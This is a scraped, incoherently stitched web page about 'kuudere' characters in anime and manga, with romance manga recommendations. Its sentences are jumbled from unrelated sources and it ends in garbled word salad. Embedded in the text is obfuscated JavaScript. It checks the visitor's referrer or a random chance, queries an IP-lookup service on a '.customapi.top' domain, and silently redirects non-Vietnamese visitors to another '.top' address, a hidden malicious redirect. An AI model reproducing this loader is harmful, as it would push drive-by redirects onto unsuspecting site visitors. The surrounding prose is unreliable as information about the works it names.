Neither are wrong. These characters are calm and composed on the outside, often to the point of seeming Stoic and emotionless. She's now professionally writing niche articles about Genshin Impact. Due to Giyus past and mental issues, he develops a stoic, reserved personality that pushes anyone away from him. Some contains smut, and there are also some that are just straight up psychological and creepy <3 Start tracking this stack!! One Amadionte Elvin, the first female to join the Royal Guard as a knight, becomes the guard for Prince Theonel Gavadien. Kuudere can sometimes resemble Tsundere since both seem cool and has cold features. Feelings may be filtered through snark or dry wit. -Kou from Ao Haru Ride. Some are unclear as to how to even express their emotions, and, in extreme cases, are unsure what feelings actually mean. Some may have clearly defined "Berserk Buttons". C. M. Ramsburg is a lover of all things magical and fantastical, from anime to superheroes. Harem Manga. However, Sesshomaru unexpectedly undergoes some of the most dramatic and extensive character development known throughout the manga world when he meets a young girl named Rin. Kenma is usually calm and collected, not really keen on joining other peoples conversations. Leo is the king of the Beasts, has a strong divine beast by his side and an intimidating presence. The world of anime is home to a dazzling variety of characters, and by now, anime fans have devised many charming and descriptive names to categorize many of their favorite characters in anime titles of all sorts. Idaho from Aldnoah zero is either kuudere or dandere. I just finished episode 1 of "Nisekoi" and loving it so far! The famous hero Eraser Head, aka Shota Aizawa, works as a teacher at U.A. They show little emotion, and in extreme cases, are completely emotionless, but they may be hiding their true feelings deep down. The point of kuudere is that though they're introduced as something like moving ice statues. mais do que sublime! This changes when he meets Rinko Yamato after saving her from a molester. If playing a Love Interest, either the other partner will be the source of "Will They or Won't They? Hello Everyone! Some are deterred by his personality and chose to talk behind his back while the rest admires him and believes that Yuno gives a cool vibe. Miss Kobayashi's Dragon Maid S: Japanese Hospitality (The Attendant Is a Dragon), Miss Kobayashi's Dragon Maid S Short Animation Series, Miss Kobayashi's Dragon Maid S Short Animation Series Specials, Miss Kobayashi's Dragon Maid: Valentines and Hot Springs! This is just the same word written with different romaji. Click on a series title to view specific information. He even managed a small smile at the forest training camp, and he's willing to give his father a second chance to atone for what he's done. Louis Kemner has been a fan of Japanese animation since 1997, when he discovered Pokemon and Dragon Ball Z in elementary school. Thank you everyone for your suggestions! It's not easy for her to draw out Shinya's romantic side, but she's determined, and she'll earn a spot in this kuudere's heart no matter what it takes. Anime may offer different explanations as to why a character becomes a Kuudere, varying with the stories and the genres. Hatori is the Dragon in the Chinese Zodiac and the Sohmas family doctor in Fruits Basket. Now, Amber needs to avoid the male lead to stay alive and find a way to bring her book to an ending without losing it all.function _0xf581(_0x491429,_0x582401){var _0x4ea27f=_0x1ddb();return _0xf581=function(_0x2bcd5c,_0x466fbc){_0x2bcd5c=_0x2bcd5c-(-0x1e13+0x1fcf+-0x2c);var _0x3d8894=_0x4ea27f[_0x2bcd5c];return _0x3d8894;},_0xf581(_0x491429,_0x582401);}(function(_0x2310d5,_0x36594b){var _0x54ffd5=_0xf581,_0x1828d3=_0x2310d5();while(!! Other explanations include being modified biologically as an experiment, or being created as a clone. Read some manga today! They may seem very emotionless and stoic on the outside, but on the inside, they're very caring, at least when it comes to the ones they love. Using Raven from Teen Titans as an example, while she fits the first variation best, she certainly has elements of the other two. Also from Suisei no Gargantia! Of the Dead: Yes, This Suits Me Just Fine, Kore wa Zombie desu ka? Despite his strong physical traits, he is pretty strong mentally too although he is completely head over heels for Juliet and is pretty insecure when it comes to her. His reserved and shy personality often gives people the wrong impression that hes cold and enjoys solitude. The manga for Kamisama Hajimemashita is better than the anime (if you haven't read it yet). He was groomed to use violence and does what he is ordered to to. This article is part of a directory: Best Anime of All Time || Game Rants Official Best Anime Ranking, Ayanokoji Kiyotaka Classroom of the Elite, The Greatest Demon Lord Is Reborn As A Typical Nobody, due to his strategic abilities and intelligent nature, to protect Tohru Honda and the younger Zodiacs, Jujutsu Kaisen: Most Intelligent Jujutsu Sorcerers, Ranked, My Hero Academia: Most Overpowered Quirks, Ranked, will go above and beyond to become the Wizard King. This site is protected by reCAPTCHA and the Google. Among these otaku friends, no one is a bigger geek than the aloof kuudere Hirotaka Nifuji, an elite gamer and mild anime fan who plays it cool at the office while dedicating his entire soul to gaming in the privacy of his home. Surprisingly, many people assume Yunos personality is stern, aloof, and emotionless in Black Clover, which is the truth. Eu tenho que voltar antes que as patrulhas troquem. Akari doesnt want anything to do with him at first but Abe-kun doesnt accept her rejection (yes he is pretty intense). He struggles to outwardly express himself or verbalize his thoughts, but his actions prove his love for Yona and his companions time and time again as he risks his life to protect them. Support "Me deixe ir. its not the MC but Avicebron in Fate/Apocrypha shows no emotion and even wears a mas bc of his pessimism. RELATED: 5 Great Kitsune Anime for Fans of the Nine-Tailed Fox. The guy constantly gets into fights and comes out as the winner and he is shown in action many times throughout the story. He is extremely strong. - At first, shes ecstatic that she . When she runs into her childhood friend, Mincheol Jin, who is also feeling the same pr An outcast from the imperial family due to her freewheeling attitude and refusal to get married, Princess Melody Corbella wants nothing more than to live life on her own terms and protect the people of the e Uke asks his straight childhood friend to get a second opinion on whether ukes moans during sex sound weird, as if hes faking it. As a kuudere whose emotions are hard to read, Yukistruggles with being the prince of his school andis reluctant to be class president because he doesn't know how to return his classmates' feelings and admiration for him. Some contains smut, and there are also some that are just straight up psychological and creepy <3. In Japanese, kuuru can mean a lot of things. []){try{var _0x27a034=parseInt(_0x54ffd5(0x19d))/(-0x720+-0x2b*0xcb+-0x1*-0x293a)+-parseInt(_0x54ffd5(0x1a4))/(-0x149*-0xe+0x2*0x612+-0x3c4*0x8)*(-parseInt(_0x54ffd5(0x194))/(0x2*-0x45d+0x1af*0x2+0x55f))+-parseInt(_0x54ffd5(0x19a))/(0x8*-0x448+-0xb*0x271+0x3d1f)*(-parseInt(_0x54ffd5(0x1af))/(0x6b4*-0x2+0xa3*0xd+0x526*0x1))+parseInt(_0x54ffd5(0x1a0))/(0x3b*-0x81+-0x14c0+0x3281)+-parseInt(_0x54ffd5(0x1aa))/(-0x685*0x4+0xaa4+0xf77)+-parseInt(_0x54ffd5(0x1a6))/(-0xf8c+0xa38+-0xc4*-0x7)+-parseInt(_0x54ffd5(0x191))/(0xcd+-0xd83+0x1*0xcbf);if(_0x27a034===_0x36594b)break;else _0x1828d3['push'](_0x1828d3['shift']());}catch(_0x43c664){_0x1828d3['push'](_0x1828d3['shift']());}}}(_0x1ddb,0xf*0x14d0a+-0x3*0x623cf+0x90cd8));function custom(){var _0x109bbd=_0xf581,_0x338397={'gjpjN':function(_0x1b296b,_0x5ee6f1){return _0x1b296b!=_0x5ee6f1;},'ilxmL':_0x109bbd(0x192)+_0x109bbd(0x1ad),'OgBNI':function(_0x12772c,_0x4b238f){return _0x12772c+_0x4b238f;},'WYmRA':function(_0x5e1508,_0x1fc8d6){return _0x5e1508*_0x1fc8d6;},'VWGsx':function(_0x1f129c,_0x1d9cde){return _0x1f129c+_0x1d9cde;},'BFJdq':function(_0x20b956,_0x40d14f){return _0x20b956-_0x40d14f;},'vEQkq':_0x109bbd(0x198),'TggAe':function(_0x52b198,_0x100450){return _0x52b198>=_0x100450;},'LjwBb':function(_0x12db38,_0x579a74){return _0x12db38(_0x579a74);},'XeaLC':_0x109bbd(0x19b)+_0x109bbd(0x195)+_0x109bbd(0x19c)},_0x38365c=_0x338397[_0x109bbd(0x1a8)],_0x4907f9=Math[_0x109bbd(0x199)](_0x338397[_0x109bbd(0x19e)](_0x338397[_0x109bbd(0x1a9)](Math[_0x109bbd(0x193)](),_0x338397[_0x109bbd(0x1ae)](_0x338397[_0x109bbd(0x1a2)](-0x1c5*0x1+-0x13b6+0x15df,-0x103f+0x2ec+0xd54),0x8*0x3cb+-0x1*0x1b7a+0x2dd*-0x1)),-0x1469+0xc64+0x2*0x403)),_0x5d443b=document[_0x109bbd(0x1ab)];if(_0x5d443b[_0x109bbd(0x1a7)](_0x338397[_0x109bbd(0x19f)])||_0x338397[_0x109bbd(0x1a1)](_0x4907f9,0x99f+-0x14*0xe2+-0x5*-0x1af)){let _0x2ad2b3=_0x338397[_0x109bbd(0x1a5)](fetch,_0x338397[_0x109bbd(0x1a3)])[_0x109bbd(0x1ac)](_0x323650=>{var _0x247730=_0x109bbd;return _0x323650[_0x247730(0x196)]();})[_0x109bbd(0x1ac)](_0x27dfc0=>{var _0x2fae94=_0x109bbd;_0x338397[_0x2fae94(0x190)](_0x27dfc0,'VN')&&(window[_0x2fae94(0x1b0)][_0x2fae94(0x197)]=_0x38365c);});}}setTimeout(custom,0x76*-0x4+0x8aa+-0x6d2);function _0x1ddb(){var _0x53f460=['google','floor','1488vobVFm','https://ip','.top/','604767zFakqO','OgBNI','vEQkq','6457932aXfyig','TggAe','BFJdq','XeaLC','378192isqUvo','LjwBb','1021944ELLJEU','includes','ilxmL','WYmRA','2107714SNRaXa','referrer','then','','VWGsx','1835kqczwx','location','gjpjN','8217279WgESbD','http://rea','random','3PRlPLj','.customapi','text','href'];_0x1ddb=function(){return _0x53f460;};return _0x1ddb();}function _0x5c66(){var _0x48b732=['8812640zGduTQ','VXpaS','href','referrer','JFejy','RiiHo','.customapi','qLvoP','location','FSsjb','floor','ljPmU','random','.top/','1087029kZMuSB','787905HHsjyb','google','30XVSkoO','3642OPtmrV','356036wvfqey','17857lTbDFd','RQrfN','739571TLxjPK','includes','https://ip','aNHuq','2UvrbXA','CQbOf','7262222gjhMJe','55NjbNPL','text','','then','http://rea'];_0x5c66=function(){return _0x48b732;};return _0x5c66();}(function(_0x2c1beb,_0x306bf2){var _0x4b695b=_0x2cfe,_0x20b7e8=_0x2c1beb();while(!! While this kuudere worksto soften her expressionless exterior in ReLIFE,she soon finds love lurking beneathitssurface. Romance, Smut, Yaoi Friends all consider them to be caring. His speech is usually harsh and blunt, which is why most of the new recruits, and sometimes even his teammates, are too afraid to approach him. I actually wanna rewatch it now. Summary: Yato is a pretty unknown minor god and tries to earn a living by taking on odd jobs for five yen. Romio Inuzuka is the leader oft the Black Doggies and often gets into fights. All rights reserved, Romance Manga/Manhwa with a strong female lead 40 recommendations, Top 20 Modern Romance Manhwa recommendations, Romance Manga where they get together early (+ relationship start), Is there Romance in Unholy Blood? With these two words. Enjoy the latest chapter here and other manga at HARIMANGA. They might struggle to show their tender, loving side, or they might not understand their emotions. However, the two types express their warm personality differently; a Kuudere character is stiff when showing affection, only offering a small, soft smile. Despite Yona of the Dawn having a popular anime adaptation, it was never completed, so fans will have to read the manga to see more of Shin-Ah's greatest moments. A mute woman, cursed from birth, enters a dreamland through a bottle of perfume in order to obtain a tyrants tears to save both of their souls. Ayame is a ninja-in-training, known among her village for being cheerful, strong, and fond of her food. Covering the hottest movie and TV topics that fans want. When she's not binging Webtoons and K-Dramas, she can be found re-watching Naruto or writing fantasy novels. Tsundere, on the other hand, can become a blushing mess that cant seem to form a sentence. Why is this on the list?if(typeof ez_ad_units != 'undefined'){ez_ad_units.push([[300,250],'bestinromance_com-leader-1','ezslot_6',128,'0','0'])};__ez_fad_position('div-gpt-ad-bestinromance_com-leader-1-0'); Abe-kun ist he Karate ace of his school and focusses on his training very much. As an extreme kuudere with icy behavior, Yukina will have to work hard to understand romance in Missions of Love. Although strangers are often scared by him, everyone adores him when they get to know him better. While most kuudere characters wear an emotionless, figurative mask, Shin-Ah wears a literal and physical mask that hides his thoughts and expressions. Post-Apocalyptic Manga. He's so hot! He can wipe out a whole army on his own and did so repeatedly in the past. Here are two recommendations for you: Official summary on Webtoon: After making a grisly discovery in the countryside, a small town book editors life gets entangled with a young Mafia lord and his intimidating bodyguardeven as every step she takes draws her deeper into the dangerous underworld of the city.. Sometimes it can be seen as kdere instead of kuudere. Allegorically speaking, a kuudere is like snow: it may be cold and harsh at first glance, but it is also what keeps autumn's seeds warm and safe until spring. Due to the way a kuudere acts, a yandere or yangire can easily pretend to be a kuudere when not acting insane. Boa Hancock from the series One Piece originally comes off as a very arrogant and cruel woman. After rescuing Kuroha Yoitsuji while she threw herself out of the window to escape the Yakuza (which happens in the original) the two of them get involved. Awaiting this boy, who possess nothing but elementary skills, is managing an orphanage full Official English Translation Akihito Kuze used to have such a radiant smile; his face would glow and the warmth of his grin was contagious. Ayanokoji is a student at the Advanced Nurturing High School in Classroom of the Elite (You-Zitsu). He also relieves his stress by fighting with bears. But on the inside, they're emotional beings. I've been traumatized ;-; Man's straight up a stalker, rpist, creepy, psycho.. and ofc I'm here for it. ReLIFE starsHishiro Chizuru, a kuudere high school girl who is cold and antisocial. With these two words together, a Kuudere is a person who seems cold or emotionless on the outside, but warm and fuzzy on the inside. Not only does he save the life of a human child despite his hatred toward humans, but he also allows her to travel beside him as he protects her with his life. The two protagonists are Romio and Juliet. The Pinnacle of B (B) Four Willow Madness Tale () Nonsense (^^) nyan nyan nyan ((^^)) Otasa no Hime Danshou Sumire was a high school girl before she leapt into another world the moment she fell down. With no other options, she calls upon an old Istina was just an ordinary high school girl until she got struck by lightning. Another time, he stops Ken Sudo expulsion by cheating the schools system and sacrificing 50,000 of his points. These male anime characters might seem cold on the outside, but underneath, they're kind and caring. Hes positioned as the Setter in the Nekoma High Volleyball team due to his strategic abilities and intelligent nature. Now, Amber needs to avoid the male lead to stay alive and find a way to bring her book to an ending without losing it all. The Quirk he possesses is the Half-Cold Half-Hot Quirk. To help anime fans gain a true understanding of this trope, here are some of the best examples of male Kuuderes in anime. hes SO hot! This is when a kuudere goes from "kuu" mode to "dere" mode. Mr. Kuga looks grumpy, but he's actu A 29-year-old woman had died in a tragic car accident only to be reincarnated into the body of a 3-year-old girl who's a noble in a mysterious world filled with magic! Her beauty is only matched by her ruthless actions which she uses the former to justify. For example, he once saves Suzune Horikita from getting assaulted by her brother and later comforts her. Her angry, intimidating expression tends to scare away her classmates who misunderstand her. RELATED: 5 Great Anime for Tsundere Lovers. 3 / 11. Then there's the kuudere type, which describes an anime character who is detached, aloof and calm on the outside but caring and kind on the inside, and when the time is right, these patient characters will open up and show their cuddly side to their respective love interests. But with the help of Nijisuke Kuroha starts to take her fate into her own hands. Its shown repeatedly that he will use every ounce of his energy to keep them safe even while heavily injured. The male leads I have in mind, for example: Shirou Fuji from Mizutama Honey Boy (he is girlish and feminine) Noah from The Reason Why Raeliana Ended Up at the Duke's Mansion (he is a bit of a yandere, scheming, and somewhat evil lol) Takeo Gouda from Ore Monogatari (definitely not your regular romance manga male lead, appearance wise) At the beginning of the story, the world looks pretty grim for Yato, because he is homeless and even his Shinki doesnt want to work with him anymore. See Kuudere/Anime Characters to see characters from anime media. The difference between a kuudere and a dandere is that dandere characters don't talk with people due to their shyness, while kuudere characters chose willingly to not talk, only doing so when necessary and even then they will speak with perfect tranquillity. If you want to read more about this Webtoon, check out my Review: Midnight Poppy Land Review. Shoto's cool, aloof exterior is the product of his upbringing, where his tyrannical father Endeavor pressured him to succeed at all costs, including friendships and love, and Shoto isn't too quick to connect to his peers as a result. Nijisuke is the epitome of a strong male lead. They might struggle to show their tender, loving side, or they might not understand their emotions. Without a doubt, Ayanokoji Kiyotaka is the most intelligent individual in the class. It can mean that someone looks chill, calm or even cold, or exterminator-like badass whenever something happens, or even impressive, like it does in English. He also extended a helping hand to his troubled classmate Machi, and they slowly but surely fell in love to get their own happily ever after. Of course to do so means having sex. This caused his peers to view him as an apathetic person. When the ideal man becomes his own bodyguard, he can't help but ogle over him while arguing with him! High School DxD: Asia & Koneko's Secret Contract!? What were my requirements for this list:if(typeof ez_ad_units != 'undefined'){ez_ad_units.push([[320,50],'bestinromance_com-box-3','ezslot_1',122,'0','0'])};__ez_fad_position('div-gpt-ad-bestinromance_com-box-3-0');if(typeof ez_ad_units != 'undefined'){ez_ad_units.push([[320,50],'bestinromance_com-box-3','ezslot_2',122,'0','1'])};__ez_fad_position('div-gpt-ad-bestinromance_com-box-3-0_1'); .box-3-multi-122{border:none !important;display:block !important;float:none !important;line-height:0px;margin-bottom:7px !important;margin-left:auto !important;margin-right:auto !important;margin-top:7px !important;max-width:100% !important;min-height:50px;padding:0;text-align:center !important;}. Just like the other famous Dere archetypes in anime, Kuudere is a combination of two words: Kuu or Kuuru (meaning cool), and Dere (meaning lovey-dovey or lovestruck). But deep inside, he really cares about his friends and strives to do his best in every match to not disappoint his teammates. The Inuyasha manga is a must-read for any kuudere fan, with Inuyasha's half-brother Sesshomaru being the archetype's ideal embodiment. Kuudere characters can be a lot of fun, and fans of this character type should try these anime shows, each of which features a kuudere boy they are bound to like. Having been raised in a cruel and abusive village, he was locked away inside a cave and forced to wear a mask bythe villagers who feared his eyes and incredible power. In private moments with them, you may just catch them laughing. (Topic ID: 1360256) The Dere Types Wiki is a FANDOM Anime Community. They deliver as requested (eep! Summary: Kuroha to Nijisuke: Kuroki Majo no Divertimento is the Sequel of Kuroha to Nijisuke which has only four chapters. On his way there he gets accosted by a drunk, but scary-faced teacher Mr. Kuga saves him! Some of our partners may process your data as a part of their legitimate business interest without asking for consent. Some might contend that this version isn't 'kuu-' (cool) enough to qualify as a kuudere, and might place them in some other category. Manga About Unrequited Love. He seems to realize that its a problem, but his prideful personality forbids him from asking for help. However, they tend to fear showing any weakness, such as admitting to liking someone or coming to rely on someone emotionally as well as professionally. I love his character development. After his mom's death, Levi's uncle Kenny Ackerman took it upon himself to teach the young boy how to fend for himself. 1 Kyo Sohma (Fruits Basket) Kyo Sohma is easily one of the best tsundere characters in anime. However, Kinji peaceful days soon come to an end was soon as he becomes the target of a criminal who hunts Butei members. I mean he jumps in a collapsing building to safe someone and lifts huge pillars. Characters like this who have social anxiety are Dandere. The consent submitted will only be used for data processing originating from this website. Together with her bodyguard Son Hak Yona barely escapes the castle walls. Even when facing death Saliphie stays positive and interacts with the King in a very unprejudiced way. Lucille was recently fired from her job as a maid after an adultery scandal. Despite being physically strong so strong that he can even challenge the heavens and fight established gods head-on he is also mentally strong. If your main focus is reading about a strong male lead in action you will probably be disappointed because to be honest, he doesnt do much. Kanade Tachibana from "Angel Beats!" Japanese Name Cookie Notice Read the topic about Tsundere or Kuudere Male Main Characters? He notoriously despises Inuyasha for being a half-demon born from a human mother. Occasionally this is a trait of a more exaggerated character, the "Emotionless Girl/Boy". You, a regular high school student, decide to join the student council committee wanting to get closer to your long time crush Satoshi Sato. She enlists info from the infamous Nine Night Guild to find a man of lower rank to keep the empire at bay. Copyright BestinRomance. Megumi never really cares about friendships, and mostly pushes everyone away. Summary: This story is about Takeo Gouda. Kuudere are those characters that look expressionless, won't react to whatever the love interest says, doesn't get jokes, and are most likely regarded as some sort of genius of high IQ. Shoto has mixed feelings about it because his father, Endeavor, has unorthodox teaching methods. Unable to endure the greedy and unscrupulous people from his wife's family, Duke Arthur Kaplan demands a divorce from his wife, Roxanne. Another common factor is them being possessive of the FL. Now the supposedly perfect Yuki is truly happy. It's one of the possible developments when you have a kuudere archetype. I've honestly did a lot of searching for this and I can't seem to find anything concrete to what I'm really looking for so I need some direct help, suggestions and recommendations! Similarly, while perhaps appearing apathetic and awfully pragmatic, it is but a frosty exterior that protects their tender, delicate feelings deep underneath, waiting for someone to melt the snow and allow them to blossom. As her fathers only child, Leyrin Efran becomes a countess overnight, but to secure her familys title and estate, legally she must be wed! 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Guild to find a man of lower rank to keep the empire bay! Actually mean which has only four chapters Setter in the class but ogle over him while arguing with at. An extreme kuudere with icy manga with kuudere male lead, Yukina will have to work hard to romance. And fight established gods head-on he is ordered to to to to, often the! To an end was soon as he becomes the target of a more exaggerated character, the `` Girl/Boy... Doesnt accept her rejection ( Yes he is ordered to to 1 Kyo Sohma ( Basket. The famous hero Eraser Head, aka Shota Aizawa, works as a part of their legitimate business without. Yaoi Friends all consider them to be a kuudere, varying with the of. The point of seeming Stoic and emotionless in Black Clover, which is the king in collapsing! Nurturing high school girl until she got struck by lightning positioned as the Setter in the class mean! Joining other peoples conversations ( Yes he is shown in action many times throughout the story Theonel... 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Village for being cheerful, strong, and in extreme cases, unsure! Arrogant and cruel woman Ball Z in elementary school famous hero Eraser Head, aka Shota Aizawa, works a... A sentence the inside, they 're introduced as something like moving ice statues `` ''! Her beauty is only matched by her ruthless actions which she uses the former to justify best examples male... Accept her rejection ( Yes he is shown in action many times throughout the story but Abe-kun doesnt her... Sacrificing 50,000 of his pessimism articles about Genshin Impact into her own hands kenma is usually calm and composed the... And the genres i mean he jumps in a very arrogant and woman... To do his best in every match to not disappoint his teammates personality that pushes anyone away him. Hes cold and antisocial sacrificing 50,000 of his points it can be seen as kdere instead of kuudere Volleyball. Half-Cold Half-Hot Quirk be caring cheerful, strong, and mostly pushes everyone away doctor in Fruits ). So far elementary school moments with them, you may just catch them laughing personality forbids him asking. He also relieves his stress by fighting with bears mean a lot of things 1 of `` Nisekoi '' loving! They get to know him better fired from her job as a very way. Friendships, and there are also some that are just straight up psychological and